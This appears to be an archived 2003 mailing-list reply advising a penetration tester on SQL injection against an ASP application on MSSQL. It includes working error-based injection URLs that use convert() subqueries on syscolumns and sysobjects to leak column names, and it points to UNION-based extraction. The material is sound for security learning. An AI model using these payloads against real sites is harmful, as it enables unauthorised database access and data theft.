Re: SQL Injection Basics

Hello raul,

Sunday, February 9, 2003, 7:21:47 AM, you wrote:

rjhc> I am pen testing a webapp and am having some problems with SQL injection.

rjhc> The app creates an ODBC error. Is this a garuntee of SQL Injection ?

rjhc> If I use www.victim/test.asp?userid=sfdsd

rjhc> the error is "inncorrect syntax near line 28 of test.asp" (or thats the English translation equiv in my case).

try inputtin single quote " ' " and c if it throws back ODBC error. rjhc> I know the database is called master, and has a table test. What is the syntax I should use ?

Do you need help?

In addition to our free technical library, Pantek provides professional IT services to companies who utilize Open Source software: Learn more about Pantek's Technical Support offerings Place an order for 24/7/365 Technical Support here Learn more about Pantek, who we are, and what we do Chat with a Live Operator Related securityfocus.com Links bugtraq certification focus-bsd focus-ids focus-ih focus-linux focus-ms focus-sun focus-unix-other focus-virus forensics incidents libnet linux-secnews ms-secnews pen-test secpapers secprog sectools secureshell security-basics securityjobs sf-news vuln-dev webappsec Request more information about Pantek

well u can try enumerating columns of ur TEST table like this www.victim/test.asp?userid=' select convert(int,(select top 1 name from syscolumns where id=(select id from sysobjects where name='TEST')))-- this will try to convert nvarchar value to int and throws back error where u will c first column name of ur TEST table. then u proceed further
www.victim/test.asp?userid=' select convert(int,select top 1 name from syscolumns where id=object_id("TEST") and name>'put here column name returned from previous query')--

once u know column names u can try to retrieve data with UNION or with select convert()

something like that...

well u can check out some great papers written by top sql injection ninjas like Kevin Spett, Chris Anley, Cesar Cerrudo and others. interestin to read paypaz. :)
check out owasp.org

rjhc> What are the best freeware and open source tools for testing SQL injection ? rjhc> I tried WPosion which was OK.
heh, havent heard of that

rjhc> I also tried WebSleuth (which seems to have gone from GPL to closed source commercial btw). Am I right is saying that the SQL plugin has to connect directly to the database to work ? I can only rjhc> see port 80 so don't think this will work ?

rjhc> Thanks, Raul.

rjhc> Concerned about your privacy? Follow this link to get rjhc> FREE encrypted email: https://www.hushmail.com/?l=2

Do you need more help?

In addition to our free technical library, Pantek provides professional IT services to companies who utilize Open Source software: Learn more about Pantek's Technical Support offerings Place an order for 24/7/365 Technical Support here Learn more about Pantek, who we are, and what we do Chat with a Live Operator Related securityfocus.com Links bugtraq certification focus-bsd focus-ids focus-ih focus-linux focus-ms focus-sun focus-unix-other focus-virus forensics incidents libnet linux-secnews ms-secnews pen-test secpapers secprog sectools secureshell security-basics securityjobs sf-news vuln-dev webappsec Request more information about Pantek

rjhc> Big $$$ to be made with the HushMail Affiliate Program: rjhc> https://www.hushmail.com/about.php?subloc=affiliate&l=427

-- 
Best regards,
 NetNinja                            mailto:netninja@hotmail.kg